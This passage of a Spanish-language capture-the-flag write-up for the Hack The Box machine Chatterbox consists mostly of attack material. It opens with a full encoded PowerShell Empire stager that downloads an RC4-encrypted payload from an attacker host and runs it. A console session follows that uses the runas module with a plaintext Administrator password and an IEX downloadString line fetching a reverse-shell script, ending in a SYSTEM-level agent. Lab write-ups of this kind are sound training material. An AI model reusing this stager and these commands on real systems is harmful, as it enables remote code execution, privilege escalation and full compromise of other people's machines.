HQALgBXAGUAQgBDAGwASQBFAE4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAFcAQwAuAEgAZQBhAEQAZQByAFMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAYwAuAFAAUgBPAHgAeQA9AFsAUwB5AHMAVABFAE0ALgBOAEUAdAAuAFcAZQBCAFIARQBxAFUAZQBTAHQAXQA6ADoARABlAGYAQQB1AGwAVABXAGUAQgBQAFIAbwB4AHkAOwAkAFcAYwAuAFAAcgBvAHgAWQAuAEMAcgBlAGQARQBuAFQAaQBhAGwAUwAgAD0AIABbAFMAWQBTAHQAZQBNAC4ATgBFAHQALgBDAHIARQBEAGUAbgBUAGkAQQBMAEMAYQBDAGgAZQBdADoAOgBEAGUAZgBhAFUAbABUAE4ARQB0AHcAbwBSAEsAQwByAEUAZABlAG4AVABJAEEATABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwBZAHMAVABlAE0ALgBUAGUAeAB0AC4ARQBuAEMAbwBkAGkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAWQB0AEUAUwAoACcAPgB5AG4AKwA1AEcAKQBrACoAJQAuADgALQBiADQAQgBGAFoAQwBTADsAfgAzAGMAOQAsAGEAWAAoAHcAZgA8ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgA2ADoANAA0ADMAJwA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAdwBDAC4ASABFAEEAZABlAHIAUwAuAEEAZABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0ALwA4AHIAawBUAGUAbABBAEgAUABNAGcATwBWAHYAeABiADcAYgB2ADUAVQBlAHEATwBXAFkAPQAiACkAOwAkAEQAYQB0AGEAPQAkAFcAQwAuAEQAbwB3AG4AbABPAEEARABEAEEAdABBACgAJABTAEUAcgArACQAVAApADsAJABpAFYAPQAkAGQAQQB0AGEAWwAwAC4ALgAzAF0AOwAkAEQAYQB0AEEAPQAkAGQAQQBUAGEAWwA0AC4ALgAkAEQAQQB0AGEALgBMAEUATgBnAFQAaABdADsALQBKAG8AaQBOAFsAQwBoAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
Podemos ejecutar otra vez el exploit pero cuando se conecte en vez de encontrar nishang vera a nuestro agent.
(Empire) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen
---- -- ----------- ------------ -------- ------- --- ----- ---------
AF35EWGK ps 10.10.10.74 CHATTERBOX CHATTERBOX\Alfred powershell 28172 5/0.0 2019-10-26 10:23:47
(Empire: agents) > interact AF35EWGK
(Empire: AF35EWGK) > usemodule management/runas
(Empire: powershell/management/runas) > set Arguments "IEX(New-Object Net.webClient).downloadString('http://10.10.14.26/powershellreverse.ps1')"
(Empire: powershell/management/runas) > info
Name: Invoke-RunAs
Module: powershell/management/runas
NeedsAdmin: False
OpsecSafe: True
Language: powershell
MinLanguageVersion: 2
Background: False
OutputExtension: None
Authors:
rvrsh3ll (@424f424f)
Description:
Runas knockoff. Will bypass GPO path restrictions.
Comments:
https://github.com/rvrsh3ll/Misc-Powershell-
Scripts/blob/master/RunAs.ps1
Options:
Name Required Value Description
---- -------- ------- -----------
UserName False Administrator Username to run the command as.
CredID False CredID from the store to use.
Domain False CHATTERBOX Optional domain.
Cmd True Powershell Command to run.
Arguments False "IEX(New-Object Net.webC Optional arguments for the supplied
lient).downloadString('h binary.
ttp://10.10.14.26/powers
hellreverse.ps1')"
ShowWindow False Switch. Show the window for the created
process instead of hiding it.
Password False Welcome1! Password for the specified username.
Agent True AF35EWGK Agent to run module on.
(Empire: powershell/management/runas) > execute
[*] Tasked AF35EWGK to run TASK_CMD_WAIT
[*] Agent AF35EWGK tasked with task ID 6
[*] Tasked agent AF35EWGK to run module powershell/management/runas
(Empire: powershell/management/runas) > [*] Agent AF35EWGK returned results.
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
0 1 228 84 2 0.02 28988 powershell
[*] Valid results returned by 10.10.10.74
[*] Sending POWERSHELL stager (stage 1) to 10.10.10.74
[*] New agent 1CYPDXW6 checked in
[+] Initial agent 1CYPDXW6 from 10.10.10.74 now active (Slack)
[*] Sending agent (stage 2) to 1CYPDXW6 at 10.10.10.74
(Empire: powershell/management/runas)
(Empire: powershell/management/runas) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen
---- -- ----------- ------------ -------- ------- --- ----- ---------
AF35EWGK ps 10.10.10.74 CHATTERBOX CHATTERBOX\Alfred powershell 28172 5/0.0 2019-10-26 10:25:14
1CYPDXW6 ps 10.10.10.74 CHATTERBOX *CHATTERBOX\Administrat powershell 22764 5/0.0 2019-10-26 10:25:14
(Empire: agents) > interact 1CYPDXW6
(Empire: 1CYPDXW6) > whoami
[*] Tasked 1CYPDXW6 to run TASK_SHELL
[*] Agent 1CYPDXW6 tasked with task ID 1
(Empire: 1CYPDXW6) > [*] Agent 1CYPDXW6 returned results.
CHATTERBOX\Administrator
[*] Valid results returned by 10.10.10.74
Y listo tenemos un agente corriendo como admin con Empire 🤯
